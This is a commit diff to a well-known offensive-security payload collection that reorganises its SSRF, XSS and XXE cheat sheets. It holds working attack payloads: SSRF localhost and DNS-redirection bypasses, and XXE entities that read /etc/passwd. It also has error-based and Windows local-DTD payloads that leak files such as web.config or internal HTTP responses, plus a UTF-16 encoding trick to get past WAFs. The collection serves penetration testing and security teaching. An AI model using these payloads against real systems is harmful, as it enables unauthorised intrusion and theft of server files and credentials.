SSRF + XSS details + XXE BOM

This commit is contained in:
Swissky 2022-12-13 22:29:20 +01:00
parent a1c5926f31
commit 514ac98dac
3 changed files with 114 additions and 76 deletions

View file

@ -64,24 +64,24 @@
## Payloads with localhost
Basic SSRF v1
```powershell
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
```
Basic SSRF - Alternative version
```powershell
http://localhost:80
http://localhost:443
http://localhost:22
```
* Using `localhost`
```powershell
http://localhost:80
http://localhost:443
http://localhost:22
```
* Using `127.0.0.1`
```powershell
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
```
* Using `0.0.0.0`
```powershell
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
```
## Bypassing filters
@ -110,13 +110,11 @@ http://0000::1:3128/ Squid
### Bypass localhost with a domain redirection
```powershell
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
```
* `spoofed.[BURP_COLLABORATOR]` such as `spoofed.redacted.oastify.com`
* `localtest.me` redirect to `::1`
* `company.127.0.0.1.nip.io` redirect to `127.0.0.1`
* `bugbounty.dod.network` redirect to `127.0.0.2`
The service nip.io is awesome for that, it will convert any ip address as a dns.
@ -126,7 +124,7 @@ NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, ev
### Bypass localhost with CIDR
It's a /8
IP addresses from 127.0.0.0/8
```powershell
http://127.127.127.127

View file

@ -1,11 +1,11 @@
# Cross Site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
## Summary
- [Cross Site Scripting](#cross-site-scripting)
- [Summary](#summary)
- [Vulnerability Details](#vulnerability-details)
- [Exploit code or POC](#exploit-code-or-poc)
- [Data grabber for XSS](#data-grabber-for-xss)
- [CORS](#cors)
@ -100,6 +100,19 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019)
- [References](#references)
## Vulnerability Details
Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
There are 3 main types of XSS attacks:
* **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.
* **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.
* **DOM-based XSS**: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code.
To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code.
## Exploit code or POC

View file

@ -11,6 +11,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
## Summary
- [Tools](#tools)
- [Labs](#labs)
- [Detect the vulnerability](#detect-the-vulnerability)
- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
- [Classic XXE](#classic-xxe)
@ -22,20 +23,21 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
- [Billion Laugh Attack](#billion-laugh-attack)
- [Yaml attack](#yaml-attack)
- [Parameters Laugh attack](#parameters-laugh-attack)
- [Error Based XXE](#error-based-xxe)
- [Exploiting Error Based XXE](#exploiting-error-based-xxe)
- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
- [Blind XXE](#blind-xxe)
- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
- [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
- [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
- [WAF Bypasses](#waf-bypasses)
- [Bypass via character encoding](#bypass-via-character-encoding)
- [XXE in exotic files](#xxe-in-exotic-files)
- [XXE inside SVG](#xxe-inside-svg)
- [XXE inside SOAP](#xxe-inside-soap)
- [XXE inside DOCX file](#xxe-inside-docx-file)
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
- [XXE inside DTD file](#xxe-inside-dtd-file)
- [XXE WAF Bypass via convert character encoding](#xxe-waf-bypass-via-convert-character-encoding)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
## Tools
@ -89,6 +91,20 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
```
## Labs
* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
* [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
* [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
* [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
* [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
* [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
* [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
* [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
* [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
* [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
## Detect the vulnerability
Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
@ -183,6 +199,8 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
## Exploiting XXE to perform SSRF attacks
XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
@ -243,7 +261,7 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete
<r/>
```
## Error Based XXE
## Exploiting Error Based XXE
**Payload to trigger the XXE**
@ -257,6 +275,7 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete
```
**Contents of ext.dtd**
```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
@ -266,13 +285,11 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete
## Exploiting blind XXE to exfiltrate data out-of-band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
### Blind XXE
### Basic Blind XXE
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
@ -401,42 +418,31 @@ Assuming payloads such as the previous return a verbose error. You can start poi
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
## WAF Bypasses
## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
### Bypass via character encoding
From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
XML parsers uses 4 methods to detect encoding:
* HTTP Content Type: `Content-Type: text/xml; charset=utf-8`
* Reading Byte Order Mark (BOM)
* Reading first symbols of document
* UTF-8 (3C 3F 78 6D)
* UTF-16BE (00 3C 00 3F)
* UTF-16LE (3C 00 3F 00)
* XML declaration: `<?xml version="1.0" encoding="UTF-8"?>`
### Disclose local file
| Encoding | BOM | Example | |
|----------|----------|-------------------------------------|--------------|
| UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml |
| UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l |
| UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. |
```xml
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
**Example**: We can convert the payload to `UTF-16` using [iconv](https://man7.org/linux/man-pages/man1/iconv.1.html) to bypass some WAF:
```bash
cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
```
### Disclose HTTP Response:
```xml
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "https://erp.company.com">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
```
## XXE in exotic files
@ -606,21 +612,42 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
%external;
```
### XXE WAF Bypass via convert character encoding
In XXE WAFs, DTD Prolog are usually blacklisted BUT not all WAFs blacklist the UTF-16 character encoding<br><br>
`All XML processors must accept the UTF-8 and UTF-16 encodings of Unicode`
-- https://www.w3.org/XML/xml-V10-4e-errata#E11
<br><br>
we can convert the character encoding to `UTF-16` using [iconv](https://man7.org/linux/man-pages/man1/iconv.1.html) to bypass the XXE WAF:-<br>
```bash
cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
### Disclose local file
```xml
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
```
UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules.
## Labs
### Disclose HTTP Response:
* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
```xml
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "https://erp.company.com">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
```
## References